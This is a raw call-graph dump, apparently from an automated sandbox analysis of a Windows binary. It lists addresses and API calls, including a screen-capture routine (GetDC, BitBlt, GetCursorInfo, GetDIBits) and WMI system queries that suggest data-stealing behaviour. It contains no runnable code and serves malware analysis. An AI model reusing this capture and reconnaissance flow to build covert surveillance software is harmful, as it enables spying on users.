3469f6b 2 API calls 12783->12784 12786 346f51a 12784->12786 12787 3469a76 RtlAllocateHeap 12786->12787 12788 346f526 12787->12788 12791 3468d87 2 API calls 12788->12791 12789 346f533 12789->12683 12790 346f4e5 12790->12789 12792 3468ddf 2 API calls 12790->12792 12791->12789 12793 346f509 12792->12793 12793->12683 12794->12790 12795->12686 12797 346a2f8 12796->12797 12798 346a31d 12797->12798 12799 3468ddf 2 API calls 12797->12799 12801 346a333 12797->12801 12800 3468f63 memset 12798->12800 12799->12798 12800->12801 12801->12689 12802->12691 12803->12712 12804->12715 12806 34674dd 12805->12806 12807 346f0d9 8 API calls 12806->12807 12808 34674ef 12807->12808 12808->12713 12810 346cb2f 12809->12810 12811 3469f85 2 API calls 12810->12811 12815 346cb4e 12810->12815 12812 346cb5d lstrcmpiW 12811->12812 12813 346cb73 12812->12813 12814 3468d9a 2 API calls 12813->12814 12814->12815 12815->12719 12816->12725 12825 346cd08 12817->12825 12820 346cc72 12821 3469f85 2 API calls 12820->12821 12824 346cc98 12821->12824 12822 3468d9a 2 API calls 12823 346373c 12822->12823 12823->12733 12824->12822 12826 3468f63 memset 12825->12826 12827 346cd3f 12826->12827 12828 346cdf9 LocalAlloc 12827->12828 12829 34636ee 12827->12829 12828->12829 12829->12726 12829->12820 12831 3462df3 12830->12831 12832 3462e0a 12830->12832 12833 3468e5d 3 API calls 12831->12833 12832->12739 12833->12832 12841 346ab55 12834->12841 12842 346acb3 4 API calls 12841->12842 12843 3462eef 12842->12843 12843->12743 12843->12744 12963->11447 12964->11449 13343 3462701 13344 346272a 13343->13344 13345 3462712 13343->13345 13374 346267d 13344->13374 13351 34670a0 13345->13351 13349 3469e22 2 API calls 13350 3462743 13349->13350 13352 34670c2 13351->13352 13353 34670ba 13351->13353 13354 346bfc8 2 API calls 13352->13354 13353->13344 13355 34670cb 13354->13355 13355->13353 13381 3470e8e 13355->13381 13358 3468ddf 2 API calls 13358->13353 13359 3469993 7 API calls 13360 346711b 13359->13360 13360->13353 13361 346670a 5 API calls 13360->13361 13362 346712d 13361->13362 13363 346713a 13362->13363 13365 3467152 13362->13365 13364 3468ddf 2 API calls 13363->13364 13364->13353 13366 3465c05 8 API calls 13365->13366 13373 3467172 13365->13373 13369 346716e 13366->13369 13367 3468ddf 2 API calls 13368 34671a4 13367->13368 13370 3468ddf 2 API calls 13368->13370 13371 346abf8 6 API calls 13369->13371 13369->13373 13372 34670e5 13370->13372 13371->13373 13372->13358 13373->13367 13375 346bfc8 2 API calls 13374->13375 13376 346268e 13375->13376 13377 34626a5 13376->13377 13380 34626b2 13376->13380 13392 346adc2 13376->13392 13379 3468ddf 2 API calls 13377->13379 13379->13380 13380->13349 13382 3470e9d 13381->13382 13383 3470ed9 13381->13383 13385 3468ddf 2 API calls 13382->13385 13391 3468dc9 RtlAllocateHeap 13383->13391 13386 3470ea6 13385->13386 13387 3468e2e RtlAllocateHeap 13386->13387 13390 34670df 13386->13390 13388 3470ebd 13387->13388 13389 346fb9c lstrlenW 13388->13389 13388->13390 13389->13390 13390->13359 13390->13372 13391->13386 13393 346adde 6 API calls 13392->13393 13394 346add9 13393->13394 13394->13377 14145 3465f94 14151 3468dc9 RtlAllocateHeap 14145->14151 14147 3466012 14149 346a1f8 GetSystemTimeAsFileTime 14150 3465fa9 14149->14150 14150->14147 14150->14149 14152 3465d1e GetDC 14150->14152 14151->14150 14153 3465f3e 14152->14153 14154 3465d50 CreateCompatibleDC 14152->14154 14155 3468ddf 2 API calls 14153->14155 14154->14153 14156 3465d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 14154->14156 14157 3465f5d 14155->14157 14156->14153 14158 3465d8c SelectObject 14156->14158 14159 3468ddf 2 API calls 14157->14159 14158->14153 14160 3465d9f BitBlt GetCursorInfo 14158->14160 14161 3465f68 14159->14161 14162 3465e25 SelectObject 14160->14162 14163 3465dd0 14160->14163 14165 3465f76 14161->14165 14166 3465f6f DeleteDC 14161->14166 14162->14153 14164 3465e39 GetObjectW 14162->14164 14163->14162 14167 3465dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 14163->14167 14178 3468dc9 RtlAllocateHeap 14164->14178 14169 3465f81 14165->14169 14170 3465f7a DeleteDC 14165->14170 14166->14165 14167->14162 14172 3465f85 DeleteObject 14169->14172 14173 3465f8c 14169->14173 14170->14169 14171 3465ea2 14171->14153 14174 3465eae GetDIBits 14171->14174 14172->14173 14173->14150 14179 3468dc9 RtlAllocateHeap 14174->14179 14176 3465ed4 14176->14153 14177 346fbfb 18 API calls 14176->14177 14177->14153 14178->14171 14179->14176 14180 3461295 14181 346aab0 4 API calls 14180->14181 14182 34612ac 14181->14182 14183 34612d1 14182->14183 14184 34736d5 2 API calls 14182->14184 14218 346117d 14183->14218 14184->14183 14187 346ab83 4 API calls 14188 3461316 14187->14188 14217 34613d4 14188->14217 14225 3467c67 14188->14225 14190 346b305 4 API calls 14192 34613eb 14190->14192 14193 346b3f2 5 API calls 14192->14193 14194 34613f7 14193->14194 14413 3467aa7 14194->14413 14195 3461371 14197 346b305 4 API calls 14195->14197 14200 346138d 14197->14200 14198 346ab83 4 API calls 14201 3461368 14198->14201 14391 346b3f2 14200->14391 14201->14195 14240 3466991 14201->14240 14202 3468ddf 2 API calls 14207 3461306 14202->14207 14203 346143e 14210 346133d 14203->14210 14213 346110a 8 API calls 14203->14213 14204 346142c 14442 346110a 14204->14442 14210->14202 14211 3461438 14452 34610ba 14211->14452 14213->14211 14217->14190 14219 3469f6b 2 API calls 14218->14219 14220 346118e 14219->14220 14221 3469bfd 2 API calls 14220->14221 14222 34611aa 14221->14222 14223 3468d87 2 API calls 14222->14223 14224 34611b7 14223->14224 14224->14187 14224->14207 14460 3467eb5 14225->14460 14227 3461334 14227->14195 14227->14198 14227->14210 14228 3467c84 14228->14227 14471 34676f8 14228->14471 14230 3467cae 14239 3467cb5 14230->14239 14488 3467692 14230->14488 14231 3468ddf 2 API calls 14232 3467cf0 14231->14232 14233 3468ddf 2 API calls 14232->14233 14236 3467cfb 14233->14236 14238 3468ddf 2 API calls 14236->14238 14238->14227 14239->14231 14746 3468dc9 RtlAllocateHeap 14240->14746 14242 34669a7 14243 346aaff 4 API calls 14242->14243 14390 3466ea0 14242->14390 14244 34669bc 14243->14244 14747 346fd3d 14244->14747 14249 3469ab3 RtlAllocateHeap 14250 34669e0 14249->14250 14251 3469ab3 RtlAllocateHeap 14250->14251 14252 34669f4 14251->14252 14253 3466a19 14252->14253 14255 3469ab3 RtlAllocateHeap 14252->14255 14254 3469ab3 RtlAllocateHeap 14253->14254 14256 3466a3e 14254->14256 14255->14253 14773 346e849 14256->14773 14262 3466aac 14263 3466ab3 14262->14263 14820 3468dc9 RtlAllocateHeap 14262->14820 14266 346109a 2 API calls 14263->14266 14265 3466ac1 14265->14263 14268 346bb95 memset 14265->14268 14267 3466b02 14266->14267 14821 346b83a 14267->14821 14268->14263 14271 3468d9a 2 API calls 14272 3466b1c 14271->14272 14273 346109a 2 API calls 14272->14273 14274 3466b28 14273->14274 14275 346b83a 5 API calls 14274->14275 14276 3466b33 14275->14276 14277 3468d9a 2 API calls 14276->14277 14278 3466b42 14277->14278 14279 346109a 2 API calls 14278->14279 14280 3466b4a 14279->14280 14281 346b83a 5 API calls 14280->14281 14282 3466b55 14281->14282 14283 3468d9a 2 API calls 14282->14283 14284 3466b64 14283->14284 14285 346109a 2 API calls 14284->14285 14286 3466b70 14285->14286 14287 346b83a 5 API calls 14286->14287 14288 3466b7b 14287->14288 14289 3468d9a 2 API calls 14288->14289 14290 3466b8a 14289->14290 14291 3466bdc 14290->14291 14293 346109a 2 API calls 14290->14293 14292 346109a 2 API calls 14291->14292 14294 3466bec 14292->14294 14295 3466ba3 14293->14295 14297 346b83a 5 API calls 14294->14297 14296 3469fe4 2 API calls 14295->14296 14298 3466bc5 14296->14298 14299 3466bf7 14297->14299 14300 3468d9a 2 API calls 14298->14300 14301 3468d9a 2 API calls 14299->14301 14302 3466bce 14300->14302 14303 3466c06 14301->14303 14304 346b83a 5 API calls 14302->14304 14305 346109a 2 API calls 14303->14305 14304->14291 14306 3466c12 14305->14306 14307 346b83a 5 API calls 14306->14307 14308 3466c1d 14307->14308 14309 3468d9a 2 API calls 14308->14309 14310 3466c2c 14309->14310 14311 346109a 2 API calls 14310->14311 14312 3466c34 14311->14312 14313 346b83a 5 API calls 14312->14313 14314 3466c3f 14313->14314 14315 3468d9a 2 API calls 14314->14315 14316 3466c4e 14315->14316 14317 346109a 2 API calls 14316->14317 14318 3466c5a 14317->14318 14319 346b83a 5 API calls 14318->14319 14320 3466c65 14319->14320 14321 3468d9a 2 API calls 14320->14321 14322 3466c74 14321->14322 14323 346109a 2 API calls 14322->14323 14324 3466c80 14323->14324 14325 346b83a 5 API calls 14324->14325 14326 3466c8b 14325->14326 14327 3468d9a 2 API calls 14326->14327 14328 3466c9a 14327->14328 14329 346109a 2 API calls 14328->14329 14330 3466ca6 14329->14330 14331 346b83a 5 API calls 14330->14331 14332 3466cb1 14331->14332 14333 3468d9a 2 API calls 14332->14333 14334 3466cc0 14333->14334 14335 346109a 2 API calls 14334->14335 14336 3466ccc 14335->14336 14337 346b83a 5 API calls 14336->14337 14338 3466cd7 14337->14338 14390->14195 14392 346aab0 4 API calls 14391->14392 14393 346b404 14392->14393 14394 346a1f8 GetSystemTimeAsFileTime 14393->14394 14395 3461399 14394->14395 14396 3467d0f 14395->14396 14924 3470522 14396->14924 14398 3467d2f 14927 3468146 14398->14927 15098 3469905 14413->15098 14416 3470522 GetTickCount 14417 3467aee 14416->14417 15104 3467f12 14417->15104 14419 3461420 14419->14203 14419->14204 14420 3467b0e 14420->14419 14421 34676f8 19 API calls 14420->14421 14422 3467b3e 14421->14422 14426 3467692 8 API calls 14422->14426 14441 3467b45 14422->14441 14423 3468ddf 2 API calls 14424 3467c47 14423->14424 14425 3468ddf 2 API calls 14424->14425 14427 3467c52 14425->14427 14428 3467b6f 14426->14428 14429 3468ddf 2 API calls 14427->14429 14428->14441 15143 346793f 14428->15143 14429->14419 14431 3467b9a 14431->14441 15156 346780f 14431->15156 14434 346110a 8 API calls 14435 3467bda 14434->14435 14436 3467be6 14435->14436 14437 3468f63 memset 14435->14437 15170 34677be 14436->15170 14438 3467bfb 14437->14438 14439 3461d97 6 API calls 14438->14439 14439->14436 14441->14423 14443 3461120 14442->14443 14444 346a06e memset 14443->14444 14445 3461174 14443->14445 14446 3461146 14444->14446 14445->14211 14447 346a1f8 GetSystemTimeAsFileTime 14446->14447 14448 346115b 14447->14448 14449 346ac24 6 API calls 14448->14449 14450 3461169 14449->14450 14451 346abf8 6 API calls 14450->14451 14451->14445 14453 34610c6 14452->14453 14454 34610da 14452->14454 14455 346aaff 4 API calls 14453->14455 14456 346aaff 4 API calls 14454->14456 14457 34610cd 14455->14457 14456->14457 14458 3469fa5 2 API calls 14457->14458 14459 34610fd 14458->14459 14459->14210 14500 34711b3 14460->14500 14462 3467ebe 14504 3468927 14462->14504 14464 3467ed1 14465 3468927 strncpy 14464->14465 14466 3467ee5 14465->14466 14467 3468927 strncpy 14466->14467 14468 3467ef9 14467->14468 14508 3471c34 14468->14508 14470 3467f01 14470->14228 14600 34675e1 14471->14600 14474 346bf56 RtlAllocateHeap 14475 3467732 14474->14475 14476 3467767 14475->14476 14611 34674fe 14475->14611 14477 3468ddf 2 API calls 14476->14477 14479 346777f 14477->14479 14480 3468ddf 2 API calls 14479->14480 14481 346778a 14480->14481 14482 3468ddf 2 API calls 14481->14482 14484 3467795 14482->14484 14483 3467740 14483->14476 14619 346faaf 14483->14619 14486 3468ddf 2 API calls 14484->14486 14487 346779f 14484->14487 14486->14487 14487->14230 14489 346bfc8 2 API calls 14488->14489 14490 34676aa 14489->14490 14491 346755a 5 API calls 14490->14491 14496 34676e6 14490->14496 14492 34676c9 14491->14492 14493 3470485 lstrlenW 14492->14493 14494 34676dd 14493->14494 14495 3468ecb lstrlenW 14494->14495 14495->14496 14497 34678c5 14496->14497 14687 3471d21 14497->14687 14499 34678de 14499->14239 14501 34711bb 14500->14501 14502 34711c2 14501->14502 14513 34728ef 14501->14513 14502->14462 14505 346893d 14504->14505 14506 3468938 14504->14506 14531 3471293 14505->14531 14506->14464 14509 3471c43 14508->14509 14510 3471c48 14509->14510 14543 3471bd8 14509->14543 14510->14470 14512 3471c61 14512->14470 14514 3472931 14513->14514 14515 34728fe 14513->14515 14514->14502 14516 3472922 SwitchToThread 14515->14516 14517 347290f 14515->14517 14516->14514 14516->14516 14518 3472918 14517->14518 14520 34728c9 14517->14520 14518->14502 14525 3472951 GetModuleHandleW 14520->14525 14522 34728d6 14524 34728e4 14522->14524 14530 3472933 _time64 GetCurrentProcessId 14522->14530 14524->14518 14526 347296f GetProcAddress 14525->14526 14529 34729a0 14525->14529 14527 3472983 GetProcAddress 14526->14527 14526->14529 14528 3472992 GetProcAddress 14527->14528 14527->14529 14528->14529 14529->14522 14530->14524 14532 34712c5 14531->14532 14533 347129e 14531->14533 14532->14506 14533->14532 14535 34712d9 14533->14535 14536 3471307 14535->14536 14537 34712e4 14535->14537 14536->14532 14537->14536 14539 3472edb 14537->14539 14540 3472ef3 14539->14540 14541 3472f46 14540->14541 14542 3472f7a strncpy 14540->14542 14541->14536 14542->14541 14544 3471beb 14543->14544 14545 3471c07 14544->14545 14547 34714c5 14544->14547 14545->14512 14548 34714f3 14547->14548 14549 3471505 14547->14549 14548->14549 14550 34716c3 14548->14550 14551 34715b0 14548->14551 14552 347152f 14548->14552 14553 347155f 14548->14553 14557 347158f 14548->14557 14549->14545 14556 3471c8e 2 API calls 14550->14556 14588 3471c8e _snprintf 14551->14588 14555 3471535 _snprintf 14552->14555 14571 34733da 14553->14571 14555->14549 14560 34716f2 14556->14560 14583 3471a0a 14557->14583 14560->14549 14563 3471774 14560->14563 14566 34718aa 14560->14566 14561 34715bf 14561->14549 14562 34714c5 11 API calls 14561->14562 14562->14561 14563->14549 14565 34717b5 qsort 14563->14565 14564 3471a0a 2 API calls 14564->14566 14565->14549 14567 34717de 14565->14567 14566->14549 14566->14564 14568 34714c5 11 API calls 14566->14568 14567->14549 14567->14567 14569 3471a0a 2 API calls 14567->14569 14570 34714c5 11 API calls 14567->14570 14568->14566 14569->14567 14570->14567 14572 34733e7 _snprintf 14571->14572 14573 34733e4 14571->14573 14574 3473410 14572->14574 14582 3473487 14572->14582 14573->14572 14574->14582 14593 34733b3 localeconv 14574->14593 14577 347344e strchr 14580 3473461 14577->14580 14577->14582 14578 347342a strchr 14578->14577 14579 3473438 14578->14579 14579->14577 14579->14582 14580->14582 14596 3468ecb 14580->14596 14582->14549 14585 3471a20 14583->14585 14584 3471ba8 14584->14549 14585->14584 14586 3471b23 _snprintf 14585->14586 14587 3471b3a _snprintf 14585->14587 14586->14585 14587->14585 14590 3471caf 14588->14590 14589 3471cb6 14589->14561 14590->14589 14591 3472edb strncpy 14590->14591 14592 3471ccc 14591->14592 14592->14561 14594 34733c3 strchr 14593->14594 14595 34733d5 strchr 14593->14595 14594->14595 14595->14577 14595->14578 14597 3468ef7 14596->14597 14597->14597 14598 3468f17 lstrlenW 14597->14598 14599 3468f2b 14598->14599 14599->14582 14599->14599 14623 3468dc9 RtlAllocateHeap 14600->14623 14602 34675fb 14603 346767c 14602->14603 14604 347357b 2 API calls 14602->14604 14603->14474 14603->14487 14605 346761f 14604->14605 14624 346755a 14605->14624 14607 3467634 14608 3470485 lstrlenW 14607->14608 14609 3467667 14608->14609 14610 3468f63 memset 14609->14610 14610->14603 14612 346750f 14611->14612 14613 34698d0 2 API calls 14612->14613 14614 346752b 14613->14614 14633 3468dc9 RtlAllocateHeap 14614->14633 14616 3467536 14617 3467550 14616->14617 14618 3469fa5 2 API calls 14616->14618 14617->14483 14618->14617 14621 346fac3 14619->14621 14622 346fb09 14621->14622 14634 346fb10 14621->14634 14622->14476 14623->14602 14625 3467573 14624->14625 14626 3461080 2 API calls 14625->14626 14627 3467580 lstrcpynA 14626->14627 14628 346759e 14627->14628 14629 3468d87 2 API calls 14628->14629 14630 34675a8 14629->14630 14631 3468f63 memset 14630->14631 14632 34675cd 14631->14632 14632->14607 14633->14616 14639 346f7a3 memset memset 14634->14639 14636 346fb5f 14636->14621 14637 346fb3c 14637->14636 14665 346f5a1 14637->14665 14640 3469f6b 2 API calls 14639->14640 14641 346f7f5 14640->14641 14642 3469f6b 2 API calls 14641->14642 14643 346f802 14642->14643 14644 3469f6b 2 API calls 14643->14644 14645 346f80f 14644->14645 14646 3469f6b 2 API calls 14645->14646 14647 346f81c 14646->14647 14648 3469f6b 2 API calls 14647->14648 14649 346f829 14648->14649 14650 3468f63 memset 14649->14650 14652 346f83d 14650->14652 14651 346f8ba GetLastError 14651->14652 14652->14651 14653 346fa0d 14652->14653 14656 346a1f8 GetSystemTimeAsFileTime 14652->14656 14657 346f8fb GetLastError 14652->14657 14659 346f953 GetLastError 14652->14659 14660 346f887 14652->14660 14662 3469f6b 2 API calls 14652->14662 14663 3468d87 2 API calls 14652->14663 14664 346f9cd GetLastError 14652->14664 14681 346f6e9 14652->14681 14654 3468f63 memset 14653->14654 14653->14660 14655 346fa2f 14654->14655 14658 346fa4b GetLastError 14655->14658 14655->14660 14656->14652 14657->14652 14658->14660 14659->14652 14660->14637 14662->14652 14663->14652 14664->14652 14666 346f5be 14665->14666 14685 3468dc9 RtlAllocateHeap 14666->14685 14668 346f5d3 14670 346f5dc 14668->14670 14686 3468dc9 RtlAllocateHeap 14668->14686 14671 3468ddf 2 API calls 14670->14671 14677 346f6af 14670->14677 14671->14677 14672 3468ddf 2 API calls 14673 346f6c7 14672->14673 14673->14636 14674 346f689 GetLastError 14674->14670 14675 346f695 14674->14675 14678 346a1f8 GetSystemTimeAsFileTime 14675->14678 14676 346a1f8 GetSystemTimeAsFileTime 14680 346f5ec 14676->14680 14677->14672 14677->14673 14678->14670 14679 3468e5d 3 API calls 14679->14680 14680->14670 14680->14674 14680->14676 14680->14677 14680->14679 14682 346f70b 14681->14682 14683 346f730 GetLastError 14682->14683 14684 346f72b 14682->14684 14683->14684 14684->14652 14685->14668 14686->14680 14688 3471d74 14687->14688 14689 3471d2e 14687->14689 14688->14499 14689->14688 14692 347246c 14689->14692 14691 3471d61 14691->14499 14699 3471e6f 14692->14699 14694 3472483 14697 34724aa 14694->14697 14703 34725e0 14694->14703 14696 34724a1 14696->14697 14698 3471e6f 8 API calls 14696->14698 14697->14691 14698->14697 14700 3471e81 14699->14700 14702 3471eba 14700->14702 14713 347200e 14700->14713 14702->14694 14704 34725f7 14703->14704 14705 3472641 14703->14705 14704->14705 14706 3472667 14704->14706 14707 3472613 14704->14707 14705->14696 14739 34723ec 14706->14739 14709 3472656 14707->14709 14710 3472618 14707->14710 14729 34724dd 14709->14729 14710->14705 14712 3472629 memchr 14710->14712 14712->14705 14716 3472028 14713->14716 14714 347204d 14714->14702 14715 34720e2 14715->14714 14720 347349a 14715->14720 14716->14714 14716->14715 14717 3472097 14716->14717 14719 34720a7 _errno _strtoi64 _errno 14717->14719 14719->14714 14726 34734fe localeconv 14720->14726 14723 34734d2 14724 34734e1 _errno 14723->14724 14725 34734ed 14723->14725 14724->14725 14725->14714 14727 34734a9 _errno strtod 14726->14727 14728 347350e strchr 14726->14728 14727->14723 14727->14724 14728->14727 14730 34711b3 7 API calls 14729->14730 14731 34724e9 14730->14731 14732 3471e6f 8 API calls 14731->14732 14738 347250b 14731->14738 14736 34724ff 14732->14736 14733 3472528 memchr 14733->14736 14733->14738 14734 34725e0 17 API calls 14734->14736 14735 34712d9 strncpy 14735->14736 14736->14733 14736->14734 14736->14735 14737 3471e6f 8 API calls 14736->14737 14736->14738 14737->14736 14738->14705 14740 34723f5 14739->14740 14741 3471e6f 8 API calls 14740->14741 14743 3472410 14740->14743 14744 3472408 14741->14744 14742 34725e0 18 API calls 14742->14744 14743->14705 14744->14742 14744->14743 14745 3471e6f 8 API calls 14744->14745 14745->14744 14746->14242 14748 3469fa5 2 API calls 14747->14748 14749 34669c7 14748->14749 14750 346e795 14749->14750 14751 3469f85 2 API calls 14750->14751 14752 346e7aa 14751->14752 14895 346e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14752->14895 14755 3468d9a 2 API calls 14756 346e7c2 14755->14756 14757 3469f85 2 API calls 14756->14757 14772 34669cc 14756->14772 14758 346e7d6 14757->14758 14759 3469f85 2 API calls 14758->14759 14760 346e7e7 14759->14760 14902 346e6d9 SysAllocString SysAllocString 14760->14902 14762 346e826 14764 3468d9a 2 API calls 14762->14764 14763 346e7f8 14763->14762 14765 3469ab3 RtlAllocateHeap 14763->14765 14766 346e82f 14764->14766 14767 346e807 VariantClear 14765->14767 14769 3468d9a 2 API calls 14766->14769 14767->14762 14770 346e838 14769->14770 14908 346e539 14770->14908 14772->14249 14774 3469f85 2 API calls 14773->14774 14775 346e85b 14774->14775 14776 346e485 6 API calls 14775->14776 14777 346e865 14776->14777 14778 3468d9a 2 API calls 14777->14778 14779 346e873 14778->14779 14780 3466a80 14779->14780 14781 3469f85 2 API calls 14779->14781 14796 346e8fa 14780->14796 14782 346e887 14781->14782 14783 3469f85 2 API calls 14782->14783 14784 346e898 14783->14784 14785 346e6d9 10 API calls 14784->14785 14786 346e8a9 14785->14786 14787 346e8d7 14786->14787 14788 3469ab3 RtlAllocateHeap 14786->14788 14789 3468d9a 2 API calls 14787->14789 14790 346e8b8 VariantClear 14788->14790 14791 346e8e0 14789->14791 14790->14787 14792 3468d9a 2 API calls 14791->14792 14794 346e8e9 14792->14794 14795 346e539 2 API calls 14794->14795 14795->14780 14797 3469f85 2 API calls 14796->14797 14798 346e90f 14797->14798 14799 346e485 6 API calls 14798->14799 14800 346e919 14799->14800 14801 3468d9a 2 API calls 14800->14801 14802 346e927 14801->14802 14803 3466a88 14802->14803 14804 3469f85 2 API calls 14802->14804 14819 3468dc9 RtlAllocateHeap 14803->14819 14805 346e93b 14804->14805 14806 3469f85 2 API calls 14805->14806 14807 346e94c 14806->14807 14808 346e6d9 10 API calls 14807->14808 14809 346e95d 14808->14809 14810 346e98b 14809->14810 14812 3469ab3 RtlAllocateHeap 14809->14812 14811 3468d9a 2 API calls 14810->14811 14813 346e994 14811->14813 14814 346e96c VariantClear 14812->14814 14815 3468d9a 2 API calls 14813->14815 14814->14810 14817 346e99d 14815->14817 14818 346e539 2 API calls 14817->14818 14818->14803 14819->14262 14820->14265 14822 3468f63 memset 14821->14822 14823 346b87e 14822->14823 14824 3468f63 memset 14823->14824 14825 346b88a 14824->14825 14826 346b9e2 14825->14826 14829 3466b0d 14825->14829 14913 3468dc9 RtlAllocateHeap 14825->14913 14828 3468ddf 2 API calls 14826->14828 14828->14829 14829->14271 14830 3469bfd 2 API calls 14832 346b8f9 14830->14832 14831 3469a76 RtlAllocateHeap 14831->14832 14832->14826 14832->14829 14832->14830 14832->14831 14833 3468ddf 2 API calls 14832->14833 14834 346b9a8 14832->14834 14833->14832 14834->14826 14835 3469b26 2 API calls 14834->14835 14836 346b9cb 14835->14836 14836->14826 14837 346b9d1 14836->14837 14838 3468ddf 2 API calls 14837->14838 14838->14829 14896 346e4ca SysAllocString 14895->14896 14897 346e507 14895->14897 14898 346e4e5 14896->14898 14897->14755 14898->14897 14899 346e4e9 CoSetProxyBlanket 14898->14899 14899->14897 14900 346e500 14899->14900 14912 3468dc9 RtlAllocateHeap 14900->14912 14903 3469f85 2 API calls 14902->14903 14904 346e704 SysAllocString 14903->14904 14905 3468d9a 2 API calls 14904->14905 14907 346e717 SysFreeString SysFreeString SysFreeString 14905->14907 14907->14763 14909 346e544 14908->14909 14910 3468ddf 2 API calls 14909->14910 14911 346e561 14910->14911 14911->14772 14912->14897 14913->14832 14925 3470542 GetTickCount 14924->14925 14926 3470531 __aulldiv 14924->14926 14925->14398 14926->14398 14928 34711b3 7 API calls 14927->14928 14929 3468156 14928->14929 14930 3468927 strncpy 14929->14930 14931 346816f 14930->14931 14932 3468927 strncpy 14931->14932 14933 3468183 14932->14933 14934 3468927 strncpy 14933->14934 14935 3468194 14934->14935 14936 3468927 strncpy 14935->14936 14937 34681a7 14936->14937 14938 3468927 strncpy 14937->14938 14939 34681bd 14938->14939 14940 3468927 strncpy 14939->14940 14941 34681d1 14940->14941 14942 3468927 strncpy 14941->14942 14943 34681ea 14942->14943 14944 3468927 strncpy 14943->14944 14945 34681fe 14944->14945 14946 3468927 strncpy 14945->14946 14947 3468212 14946->14947 14948 3468927 strncpy 14947->14948 14949 3468226 14948->14949 14950 3468927 strncpy 14949->14950 14951 346823c 14950->14951 14952 3468927 strncpy 14951->14952 14953 3468253 14952->14953 15083 3468983 14953->15083 14956 3468927 strncpy 14957 3468266 14956->14957 14958 3468927 strncpy 14957->14958 14959 346827a 14958->14959 14960 3468927 strncpy 14959->14960 14961 346828e 14960->14961 14962 3468983 5 API calls 14961->14962 14963 3468296 14962->14963 14964 3468927 strncpy 14963->14964 14965 34682a1 14964->14965 14966 3468983 5 API calls 14965->14966 14967 34682a9 14966->14967 14968 3468927 strncpy 14967->14968 14969 34682b4 14968->14969 14970 3468983 5 API calls 14969->14970 14971 34682bc 14970->14971 14972 3468927 strncpy 14971->14972 14973 34682c7 14972->14973 14974 3468927 strncpy 14973->14974 14975 34682db 14974->14975 14976 3468983 5 API calls 14975->14976 14977 34682e3 14976->14977 14978 3468927 strncpy 14977->14978 14979 34682ee 14978->14979 14980 3468927 strncpy 14979->14980 14981 3468308 14980->14981 14982 3468983 5 API calls 14981->14982 14983 3468310 14982->14983 14984 3468927 strncpy 14983->14984 14985 346831b 14984->14985 14986 3468927 strncpy 14985->14986 14987 346832f 14986->14987 14988 3468927 strncpy 14987->14988 14989 3468343 14988->14989 14990 3468983 5 API calls 14989->14990 14991 3468357 14990->14991 14992 3468927 strncpy 14991->14992 14993 3468362 14992->14993 14994 3468927 strncpy 14993->14994 14995 3468376 14994->14995 14996 3468927 strncpy 14995->14996 14997 346838a 14996->14997 14998 3468983 5 API calls 14997->14998 14999 3468395 14998->14999 15000 3468927 strncpy 14999->15000 15001 34683a0 15000->15001 15002 3468983 5 API calls 15001->15002 15003 34683ab 15002->15003 15004 3468927 strncpy 15003->15004 15005 34683b6 15004->15005 15006 3468983 5 API calls 15005->15006 15007 34683c1 15006->15007 15008 3468927 strncpy 15007->15008 15009 34683cc 15008->15009 15010 3468983 5 API calls 15009->15010 15011 34683d7 15010->15011 15012 3468927 strncpy 15011->15012 15013 34683e2 15012->15013 15014 3468983 5 API calls 15013->15014 15015 34683ed 15014->15015 15016 3468927 strncpy 15015->15016 15017 34683f8 15016->15017 15018 3468983 5 API calls 15017->15018 15019 3468403 15018->15019 15020 3468927 strncpy 15019->15020 15021 346840e 15020->15021 15022 3468983 5 API calls 15021->15022 15023 3468419 15022->15023 15024 3468927 strncpy 15023->15024 15088 3469b62 15083->15088 15085 346825b 15085->14956 15086 3468996 15086->15085 15087 3468ddf 2 API calls 15086->15087 15087->15085 15089 3469b71 WideCharToMultiByte 15088->15089 15090 3469bc1 15088->15090 15089->15090 15091 3469b8c 15089->15091 15090->15086 15097 3468dc9 RtlAllocateHeap 15091->15097 15093 3469b95 15093->15090 15094 3469b9d WideCharToMultiByte 15093->15094 15094->15090 15095 3469bb6 15094->15095 15096 3468ddf 2 API calls 15095->15096 15096->15090 15097->15093 15099 3469913 15098->15099 15100 34736d5 2 API calls 15099->15100 15101 346995d 15100->15101 15102 3467ae9 15101->15102 15103 34736d5 2 API calls 15101->15103 15102->14416 15103->15101 15105 34711b3 7 API calls 15104->15105 15106 3467f21 15105->15106 15107 3468927 strncpy 15106->15107 15108 3467f37 15107->15108 15109 3468927 strncpy 15108->15109 15110 3467f4c 15109->15110 15111 3468927 strncpy 15110->15111 15112 3467f60 15111->15112 15113 3468927 strncpy 15112->15113 15114 3467f75 15113->15114 15115 3468927 strncpy 15114->15115 15116 3467f86 15115->15116 15117 3468927 strncpy 15116->15117 15118 3467f9f 15117->15118 15119 3468927 strncpy 15118->15119 15120 3467fb5 15119->15120 15121 3468927 strncpy 15120->15121 15122 3467fc6 15121->15122 15123 3468927 strncpy 15122->15123 15124 3467fda 15123->15124 15125 3468927 strncpy 15124->15125 15126 3467fed 15125->15126 15127 3468927 strncpy 15126->15127 15128 3468001 15127->15128 15129 3468927 strncpy 15128->15129 15130 3468020 15129->15130 15131 3468983 5 API calls 15130->15131 15132 3468031 15131->15132 15133 3468927 strncpy 15132->15133 15134 346803c 15133->15134 15135 3468983 5 API calls 15134->15135 15136 346804d 15135->15136 15137 3468927 strncpy 15136->15137 15138 3468058 15137->15138 15139 3468927 strncpy 15138->15139 15140 3468074 15139->15140 15141 3471c34 13 API calls 15140->15141 15142 346807c 15141->15142 15142->14420 15144 3471d21 18 API calls 15143->15144 15145 346795d 15144->15145 15146 346a06e memset 15145->15146 15149 3467969 15145->15149 15147 346799d 15146->15147 15147->15149 15177 3468dc9 RtlAllocateHeap 15147->15177 15149->14431 15150 3467a75 15151 3468ddf 2 API calls 15150->15151 15153 3467a86 15150->15153 15151->15150 15152 3467a21 15152->15149 15152->15150 15154 3469a76 RtlAllocateHeap 15152->15154 15155 3468ddf 2 API calls 15153->15155 15154->15152 15155->15149 15157 3467826 15156->15157 15158 346bfc8 2 API calls 15157->15158 15159 34678b6 15157->15159 15160 3467842 15158->15160 15159->14434 15159->14441 15160->15159 15161 346788e 15160->15161 15178 3468dc9 RtlAllocateHeap 15160->15178 15163 3468ddf 2 API calls 15161->15163 15165 34678ac 15163->15165 15164 346785f 15164->15161 15167 3469fa5 2 API calls 15164->15167 15166 3468ddf 2 API calls 15165->15166 15166->15159 15168 346787e 15167->15168 15179 